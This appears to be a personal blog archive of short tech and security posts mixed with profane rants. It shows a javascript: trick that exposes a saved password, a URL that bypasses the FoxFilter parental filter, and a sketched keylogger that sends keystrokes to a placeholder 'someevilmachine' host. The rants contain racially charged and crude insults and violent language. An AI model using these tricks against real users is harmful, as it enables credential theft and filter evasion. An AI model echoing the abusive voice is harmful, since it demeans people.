But you forgot it in the meanwhile…

Usually, you used Firefox’s “Remember my password for this site” to remember stuff *for* you. This works out, most of the time…. until you change your computer and you do not have access to the cached passwords anymore.

Likewise, simply copying the “signons.sqlite” file to the new machine will not work, the passwords are encrypted with the master password.

Luckily, I *do* still have access to the old Firefox running on the old laptop…

So, I visited the website I wanted to log into and lo and behold, it filled in the cached username and password… Firebug is an excellent tool that can help out here — find the input that contains the password field and remember its ID. Then, in the location bar, type the following, et voila, that’s your password right there:
javascript:alert( document.getElementById( 'password_field_id' ).value );

I hear you say, “there’s nothing spectaculair about this, this is a very old and known trick”. Yes, I know — all the more reason to find it ridiculous that this still works!

Amazing that such an unsafe ‘feature’ like the password field still exists nowadays.

And all other so-called “laws” that ought to protect “intellectual property”.

To prevent other people from stealing it and putting it on the market with cheaper labour.

So that’s saying: we want to protect intellectual property. Because we are so smart and innovative.

But you must pay the full price that we put to that crap we produce. Can’t have any fair competition giving everybody the change to market it….

(Ironically, USA wouldn’t have been there if all that criminal scum didn’t leave Europe, so factually, all your base belongs to us *anyway*.)

Obama: you’s the white man’s new bitch. The biggest one ever. Oh my god how many people you must put to shame with your “white” behaviour. Bitch is worse than the KKK….

Haha, damn criminals, each and every one of those politicians.

Oh fuck, it’s not even funny.

I feel really sorry for the people that thought the world was seriously going to change for the better when that clown took that post.

But hey, you /could’ve/ seen this shit coming.

Anyway, deciding I’d take a little peek in the first random Firefox filtering plugin that I could find, downloaded it from “some site”, and unpacked the XPI.

This immediately caught my eye, and any coders should see the obvious error:

    //don't hide page if within FoxFilter mgmt pages
    if(aURI.spec.indexOf("chrome://foxfilter") != -1)
        return;

That is definitely not the way to check for such an URL. Quite a “beginners” error actually. I wanted to confirm this makes the whole filter useless, but was incorrectly thinking that I had to register first before using the plugin — so closed the browser and deleted the add-on.

Later I thought differently, and couldn’t resist finding it again and re-installing it. This time I downloaded it from the Mozilla Add-On site; and an agreement I had to agree to. Oh well…

There this caught my eye though: “The FoxFilter Team has spent HUNDREDS of hours in development, maintenance and support of FoxFilter. We are very proud of our product and are very happy that is helping protect children, teens AND adults from inappropriate content on the Internet.“.

Hundreds of hours missed that obvious error? Took me barely 5 seconds… OK enough with the being cocky already…

Anyway, downloaded the thing again; re-installed it and confirmed filtering was succesful when I went to “http://www.playboy.com”.

And, confirmed that it horribly failed on “http://www.playboy.com/?chrome://foxfilter“.

Yep, it is that easy. Then to think people pay for something it cannot really do (well until it is patched of course):

Premium Features

In addition to all of the great filtering features that have always been free of charge, we also offer security features as part of our premium service. Security features provide you with the ability to secure your settings with a password and prevent FoxFilter from being bypassed, uninstalled or disabled. A small support fee is required to obtain a registration code which enables the security features.

I’ve always thought that one should never, ever, trust software to do things that they claim to do properly. Even the most advanced logic could be bypassed by a silly mistake before it even reaches your advanced logic. If you got the chance to check it out, you should — just to prevent surprises in the future…

OK back into my lair…

Next time somebody believes your usage of the dollar sign when typing “MS” is childish, re-direct those people to that article….

‘Nuff said…

Yay.

As a result I am now delisted from Google’s index.

Apparently, this has been going on for a couple of months, but I was too busy with actual work so I never read any articles about it on the security-sites I normally occasionally visit.

Oh well, shit happens, and stuff has quickly been cleaned up (thank you, backups!) … and for safety have upgraded to the latest WordPress version. Not having upgraded a while ago, I was really just waiting for this to happen (yeh, lazy sysadmins et cetera )…

Seeing that basically the attacker could run any PHP code of his/her choice, which could include calling system binaries to retrieve information about user accounts or passwords. As I can not be a 100% sure about that at this moment, all the passwords have been reset to protect the innocent.

I am curious how long it’ll take before I get listed on Google again (as I still see Googlebot regularly visit the site)…

And… it’s not people that abuse things who harm people — it’s the people that put those things there without thinking.

An explaination: I have always been intrigued by HTML forms. As a paranoid person, I have always wondered whether companies or websites are logging keypresses to their website. Picture the situation where you want to leave feedback at a site… but finally do not hit the “Send” button because of various reasons, like, for instance, the tone was too harsh so you decide not to. For the website it could have been very useful information: unsent comment or feedback may be more valuable than the ones that are actually arriving in their inboxes.

That was quite some time ago — and I didn’t give it any more thought until recently… See, I noticed that, for instance when I have worked the whole day, or the operating system is just acting up, sometimes the wrong window has the focus, and I am happily typing away, seeing nothing appear in the window I was staring at…. (Yeh, it happens.)

Now, there could be even more valuable information! Interesting bits of text, login names — or even better, accidentally typed passwords!

With that in my paranoid mind, I started tinkering around with Javascript to see if this is actually possible… I quickly put together some rather trivial code that captures the KeyboardEvent, inspects it, and collects them all into a string. Through the body’s onunload I called a routine that displayed an alert saying something like “Hey, you left these keypresses at this website: the collected string“.

Using the onunload however has several drawbacks:
- it isn’t always called (for instance, when the browser crashes),
- it seems the body’s onunload can only be set when the document is generated, that kinda sucks if you wanted to do be able to do the keylogging by simply loading some remotely stored Javascript file.

The curious and experimenting person that I am, I realised a bad guy would be not collecting the information and printing it — but would be sending them to a remote machine. Hmm, a remote machine, so AJAX won’t do… but there are always images…. What if I dynamically create an image, with a src pointing to some other website, with the pressed character in the GET request? Nice and simple, right?

OK, so now the keylogger is loaded and active when the following line is somehow inserted into a website:

<script type=”text/javascript” src=”http://someevilmachine/wtfjs.php”></script>

This simple single script, when loaded, attaches itself to the keyPressDown event of the document, of course remembering any old setting so to be able to pass the event through to any “local” code on the target website, as an attempt to go “undetected”.

Also, modern websites have all kinds of Javascript running, and could do some additional “setting up” from Javascript from which the event handlers get set… In an attempt to take this into account, the logger attaches itself after a delay of a given amount of milliseconds. After that, the moment a keypress event is received in the window, the requests appear in the logfile on the remote website (obligatory dump follows):

GET /temp/wtfimg.php?c=d HTTP/1.1″ 200 –
GET /temp/wtfimg.php?c=s HTTP/1.1″ 200 –
GET /temp/wtfimg.php?c=d HTTP/1.1″ 200 -

The drawback to the method currently, is that it sends a request with every keystroke made, which may be noticed by the more adept computer user… it would be possible to send collected strings at a given interval… But really, actually building a succesful keylogger isn’t the point; the point was figuring out if it is really doable (which, non-surprisingly, it is).

By the way, I’m rightly aware of the fact that I am discussing nothing really new here — this is absolutely no cutting-edge stuff. More interestingly, this has probably already been done by bad guys for ages.

On some websites with many authors that incidentally have the permission to insert Javascript, these “lower level” users could be able to catch passwords of administrative users, et cetera.

All-in-all, the only thing I am really frigging flabbergasted at, is the fact that an <input type="password"> actually sends the pressed key in a keypress event… WTF!? Knowing this, and wanting to “protect” a password entry field, I tried it by giving it its own onkeypress-handler….. I figured that it would get precendence over the documents’ keypress, but alas, it doesn’t…

It seems that there is no way to guard against this, other than to re-set your “local” event handlers regularly (which is no solution but a hack!)…

In conclusion, I really think that the password input type should somehow be prevented from putting any valid information about the pressed key into the KeyboardEvent. I know it’s used for comparing 2 passwords to validate a user’s password change for instance — but some hash could perfectly suffice there.

I am convinced the website-scripter should not ever have to have access to the real password entered in that field from Javascript — thinking that that could achieve some ‘protection’ is a flawed train of thought anyways…

Oh by the way, if you are looking for code: I will not release it here. It really isn’t difficult to cook some up yourself.

I was just reading Bruce Schneier’s CRYPTO-GRAM and he linked to this suprisingly good track (direct link to MP3) by MC Frontalot, called Secrets From The Future (direct link to the lyrics).

To quote the chorus:

You can’t hide secrets from the future with math.
You can try, but I bet that in the future they laugh
at the half-assed schemes and algorithms amassed
to enforce cryptographs in the past.

I dig it — I really, really dig it.

That’s the problem with homonyms, words written the same, but with different meanings. Kanker in Dutch, really, really only is a disease (or a district in India).

Amusing to some, offending to others…

I wonder how long this wrongly has been displayed — and how long before it’s noticed by someone that’d actually take the effort of sending them an email about it…

It hit me when my girlfriends’ laptop was starting to have issues because it was running too hot and rebooting a few days ago… This was due to a clogged air-vent, and was easily solved. However, to keep an eye on the temperature, she’s loaded the KDE applet that shows the CPU temperature.

This gives an interesting insight into power consumption … for instance, during normal browsing, opening a few tabs, et cetera, the temperature quickly rises a 10 degrees Celsius just because of the Flash animations that are trying to sell stuff we’re not even remotely interested in….

The moment you close those websites with those animations: *poof* the temperature drops and the fan quiets down again.

So I propose people to stop using those damned ads (or use text-ads if you really really need to).

(I was even thinking about taking this a step further, as a “proposal to stop irritating internet plugins” … where a plugin must show a screenshot, and a (i) button which you hover over to get informed about a plugins’ intent, and allow it. If the plugins’ actual action does not fit the intent, those plugin-writer should go to jail.. yeh I’m still hatching this one…)

09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63 56 88 c0

Now what the fuck is that?

Lucky, because I was just beginning to feel like a handicapped person not being able to reach some information over the last few weeks so.

Shows you how much I care about plugins — this thing seemed to have been available since at least the 20th of November of the last year.

Anyway, so far the plugin seems OK — I noticed an slight audio/video de-sync problem seems to have gone, too. So that’s cool.

I think it’s sad that the really handicapped people are still unable to reach any of those flash-based sites out there. It still baffles me people think they are really ‘protecting’ text by shoving it into a flash animation — all it really does is cut off the people that don’t have any way of viewing or hearing it in an alternative way.

Even sadder the fact that — hey, being human and all — I can’t be bothered no more, ’cause I got a viewer!

Cool graph…

Anyways, I wouldn’t have given this any more attention if I didn’t catch somebody saying something like this in that thread:

I loved Sony, I loved my PS2. Then this whole rootkit crap happened. Because of that I am now gonna buy an XBox 360.

Yeh that’ll teach the industry!

It’s a nice demonstration of the stupidity of people in large groups because he probably won’t be the only one thinking that… Microsoft for fuck sakes — a real saint they are.

It’s really funny how, because everybody says DRM is bad and the Sony/BMG thing was pure evil, so they’re buying Microsoft stuff now. It just shows how much people really, really know: just enough to fuck ‘m up….

Sure DRM is bad — but the world needed a Sony/BMG thing to make the public realise what’s happening; but sadly they seem to be missing the point. Microsoft is doing exactly the same — difference is they own the rootkit, err, the stuff that makes up Windows (the stolen frame and the illusion of glass in it). Or their Xbox for that matter.

All of these companies are up to no good — if you really want to make a point; buy neither, because flaming one company while praising the other, while both companies are trying to accomplish the same goals, really makes you look like an idiot.

Jeremy Allison, a Samba developer, thinks the patent deal between the two companies will be “damaging to the Novell’s success in the future”,

Whilst the Microsoft patent agreement is in place there is *nothing* we can do to fix community relations. And I really mean nothing.

We can pledge patents all we wish, we can talk to the press and “community leaders”, we can do all the right things w.r.t. all our other interactions, but we will still be known as GPL violators and that’s the end of it.

The Groklaw article also mentions that Google has now hired him.

He was actually already arrested on the 10th of October earlier this year. *

According to his lawyer, it seems he doesn’t have enough money for his defense and so, Mr. Reiser is seeking to sell his company, which of course could be sad if it falls into the hands of people that want to exploit the rights to the filesystem, close it and sue the hell out of every open-source implementation.

Well, the most sad thing here of course is the fact people worry more about the filesystem than this guy and his family…

This ‘treatment’ consists of 7 online chat-sessions with a professional.

Now, I can’t get this image out of my head:

i have a drinking problem
Come, come, elucidate your thoughts.
i drink too much
I’m not sure I understand you fully.
i am an alcoholic
Did you come to me because you are an alcoholic?
yes
I understand.
help me
OK… “i are an alcoholic”. Tell me more.

Well — you get the picture.

(BTW the above dialogue was created using this Eliza implementation in Javascript which, as it implies, works from your browser.)

The content of the site really is sickening and vile. Of course, such a site should be taken down, but denial of service attacks are childish. And, everybody has a right to express themselves, even a white supremacist.

But… this isn’t expression… To go to that an extent to tell everybody how good the ‘white man’ is and, for instance, what things the black man did not invent?! These assholes probably don’t even realise that inventions are always invented in different places by different people: our brains all function the same thus we can do exactly the same.

Although I do think these white fucks have a serious mentality problem, it is almost that sad that it makes you feel sorry for them…

But hey, what idiots are we expecting morality from a bunch of idiots that like to dress up like women and give eachother names?

Anyway, I noticed the link in question is still on the first page of Google’s search results…. and because I don’t have to time and resources to quickly create a spoof ‘whitesupremacists.org’ website spreading misinformation about them, including some well-shot videos detailing on their buttfuck-fests, well, here goes:

Martin Luther King
Martin Luther King
Martin Luther King
Martin Luther King
Martin Luther King
Martin Luther King
Martin Luther King
Martin Luther King
Martin Luther King

Then again — I’d hate to see their page go away; perusing the page on rap lyrics, I noticed some songs I really gotta pick up…

Damned whidiots.

Oh my fucking god. This is serious because there are plenty of stupid people in this world to believe that crap. Fuck, the critical majority, in each and every issue, is dumber than a horses ass and knows just enough to fuck the whole world up even more.

Ballmer — you are the (fat) fucking thief here — as we all know that property implies theft.

And thieves that steal from the people, of course, rightly deserve to get punished, biblical-style…. And making statements like that, after cutting of his hands, let’s cut out his tongue too.

The sad future is, Microsoft will probably succeed in all this, BECAUSE EVERYBODY IN THIS FUCKING WORLD IS A FUCKING SPINELESS BITCH. Excuse my caps, but sheeeze, this is a fucking disgrace.

Microsoft fanbois probably praising this shit, while they don’t even know half of the Microsoft codebase is probably stolen from public domain anyway.

It seriously upsets me that all those Microsoft fanbois are critising Sony for that DRM debacle, but fuck, how a naive asshole can you be thinking that Microsoft isn’t doing exactly the same with their XBugs (and Vista etc)? Sheesh, those critics wouldn’t even know the DRM mess around them, even if somebody tripped them and they fell face down and drowned in that shit.

What do you think Microsoft is up to with all this shit? The more and more I see the things that the people are allowing to (well rather: ‘against’) themselves, the more I really tend to think that none of you people deserve the freedom you all do dream about. All these idiots probably didn’t even know that the Windows’ TCP/IP stack (you need one for networking) was initially stolen from BSD?

First, they steal all the code, and are now going after the initial sources?

They first targetted Linux, using SCO as a proxy. Now it seems they are throwing their own weight against it. Only because they want nobody to learn IT technology for free. Only to guarantee their frigging monopoly.

The future radiates uglyness and smells of pooh.

As I said earlier this month, Death To The Corporate Mafia and, as things seem to stand, the sooner, the better.

Oh shit — if only this news was a hoax, just like the release of Microsoft’s Firefox browser.

Quote Of The Week, QOTW

PROPRIETARY software emperor Microsoft has struck a deal with the Linux reseller Novell to make it easier for customers to use both Linux and Microsoft’s Windows software.

The deal will make the Vole a SuSE Linux seller and will mean the pair will share technology. It means that Vole will not file patent infringement charges against users of Suse Linux, and Novell has promised not to sue users of Windows.

“I’ll scratch your back, you’ll scratch mine.”

Or..

“Let’s stop wasting money targeting eachother but lets share it, targetting everybody else.”

The shy and retiring and very softly spoken CEO and born diplomat Steve Ballmer admitted that the deal was an acknowledgement that Linux plays an “important role” at many companies these days.

What the fuck? Article is full of crock. I can remember the fat loud-mouth good-for-nothing American fuck jump up and down a stage like a monkey screaming ‘monopoly monopoly monopoly’ (ohw nevermind, that was ‘developers developers developers’).

Anyways — the article continued…

He whispered that the deal was a bridge over the divide between open-source and proprietary software.

Let me ask you one question….

WHAT IS THE FUCK WRONG WITH THAT DIVIDE?

There’s the open source community on on side, and you got the proprietary, corporate mafia on the other.

The corporate mafia of course being the one stealing and exploiting the community.

Open source IS the community and anyone that doesn’t understand that, well, what the fuck you need a computer for — your job is obviously blindly following and sucking cock. Forgive my generalisation, but I bet you voted Bush last time, and are a supporter for the war in Iraq, too.

But anyway, I remember IBM and Novel and SCO (which still ain’t resolved either), and remembered Novell’s stance back then. I almost thought they were ‘good guys’ — but now it seems that Novell are a big bunch of nasty hairy pussies you should stay the fuck away from, otherwise you’ll get entangled in its urinated pubic hair.

A developer from the WINE team commented,

[..] that the Volnovo pact would have significant negative implications for the Open Source movement.

The crux of the deal, to Wickline, is the fact that Microsoft is promising not to assert its patents against individual non-commercial developers.

Wickline said that the pact means that there will now be a Microsoft-blessed path for such people to make use of Open Source. It also sets the stage for Vole to assert its patents against all commercial Open Sourcers who are not part of the Volnovo pact.

Yeh we will all undisputably get fucked, like how these big corporations have done the little man for decades now.

We all know that it really wasn’t the technology that pushed Microsoft in their current position… From day one it used Sneaky Deals and Contracts(TM) to give their OS the place in the market that it obviously shouldn’t have gotten.

Fun thing is that Linux, OpenBSD and the plethora of open source operating systems is taking off through word of mouth. Not a single dime on marketing — not a single deal with hardware vendors (exactly the opposite even — vendors keep their specifications hidden so only the Windows-driver is available and crap like that).

And they are all gaining up on the commercial ones…. Next thing they tried to think of (Apple and Microsoft both), was digitally restricting the music — locking down playback capabilities. That ‘technology’ really is only there to further broaden the grip of their monopoly. The motivation sure as hell isn’t getting quality sound out of Joe Average’s speakers — rather to find ways not to.

It seems like, to protect their future crap position, they found yet another way… by sleeping with their own enemy. And they want us, the people in society to live a normal, honest, honourable life, while we see (and allow) these sneaky shitty corporations fuck up everything?!

Death to corporate mafia before it fucking kills us!

Who says that websites aren’t already recording your movements?

I mean — earlier in this century I was thinking that, when you are a big corporation, and you have some ‘comments, complaints & suggestions‘ section on the website where people can, well, comment, complain and make suggestions, it is pretty damn valueable to know what people typed into that TEXTAREA but did not submit the information.

Never gave that any thought, until today, reading the above and thinking and — yeh, with all that ‘asynchronous javascript’ — that’s even more easier to implement today. I know Gmail does this — it’s one of the most important ‘features’: Google knows about every email you did not sent.. Every complaint, rant or love-letter you did not send is still in their ‘entropy’ to compressing the whole world into a single system… although you, at the last moment, decided not to send it…

Which makes me wonder… Are there any other web-based forms that actually already do this?

And more importantly — if this happens, is this illegal — or is it possible because of some loop-hole in the system (i.e. can one prevent prosecution with a well-written click-through end-user license-agreement, disclaimers, et cetera?).

I mean — they are my frigging movements — they should be protected by copyright and nobody can steal them just as it is illegal for me to download copyrighted music, right?

Why can’t I copy a CD (or do they use poor techniques in a feeble attempt to prevent me from doing so), while other types of corporations can frigging record my intellectual property? And not only websites — what about biometric systems depending on a record of your physical information. I don’t know, but being reduced to an insignificant set of parameters kind-a feels like rape. It’s disrespectfull and it introduces more problems than they solve.

There must be a way to sue the companies that do this, for just as an excessive amount of damage done, like the MPAA and RIAA are inflating the numbers of piracy. Just like them, I should be able to be a rich man too, without actually doing any real work or producing anything.

(On that note — I just love this whole ‘Try Before You Buy‘ concept that we have on the Internet these days. You can download whatever crap you might want to buy before actually wasting your hard-earned money on a piece of shit film or whatever. There are plenty of things that I wouldn’t have bought if I didn’t first got it from somewhere else. There’s nothing wrong with that. The media only too well realises that 99% of their output is plain and utter crap and don’t frigging want you to try — and have to resort to cheap marketing ploys because you’d never even be remotely interested in it.

If only the record- and movie industry had been a little more honest in the past — we could be looking at a grand world right now without the wasted cash on (flawed-by-design) DRM restrictions and, more importantly, we could’ve had quality productions. I mean — they are in the entertainment-business and I find those guys practices hardly entertaining. In that respect, the Internet really is serving society — it actually does help the people prevent them from wasting their precious cash on artificially over-priced garbage. But again, I digress….)

I just don’t like the idea of keeping tabs on where my cursor goes, the keys that I touch or what my eyes are balling, merely for creating more ‘efficient’ (read: deceiving) marketing ploys.

It’s not funny when the feds come around to take all your hardware for exposing a three year old hole (which could’ve been abused all along). ‘Taking down’ this guy doesn’t really solve any problems caused by this poor system.

Technology is mankinds Achilles-heel, I tell ya.

I mean, you can say that its wrong of the guy exploiting this hole to such an extent — but hell — it was reported on earlier, by Bruce Schneier in 2003 (!). Sure as hell it’s their own frigging fault that they hadn’t picked this up earlier, and thus allowed this ‘mass-exploitation’. And hey its pretty understandable this happens: it fucks with us any opportunity it gets — why not fuck the system?

That’s what we were discussing when we had some dinner with some friends the other day; talking about the fact that I’m a picky eater, well, that each of us have such different preferences, but that it’s hard to think of new menus because of this. And eating the same shit every time can get boring. And I also know that ‘picky eaters‘ often get the question if I they got a list of things they like for a quick reference.

So the idea spawned: some location on the internet to share your food preferences with an optional to ‘match’ these with somebody else’s.. Useful when you are meeting them for dinner: you excange IDs and you can check the site and you’re all set for a happy dinner without people irritated because they don’t like the food and/or no alternatives have been arranged for them.

After some initial talks, some initial ‘brewing’, the day after I quickly cooked something up (I already had a domain registered doing nothing for years which is just great for the job).

Only this weekend I got around to finetune it some more and lo and behold, a new site was born at brain-tag.net:

At the moment, it’s in beta — texts are incomplete and/or contain typos — but heck, use is restricted to friends only — and only these friends can invite other friends — but if you are a developer like me you know it’s fun to create and brag about stuff.

So, if you are a friend and if you’re interested in a beta-test account, let me know. (And yeh, it’s multi-lingual: Dutch and English.)

Update 2006-10-17: Meanwhile, the site has changed a bit: 356 foodstuffs as I write this, and more functionality has been added. Stuff like, for instance, support for allergies — that could be the difference between life or death! — and mucho speed- and interface-enhancements. The site might be giving away some accounts in the future, so check it out some time, maybe you’re lucky.

If they can’t even protect their ‘most valuable good’, how can we expect voting machines to tell the truth?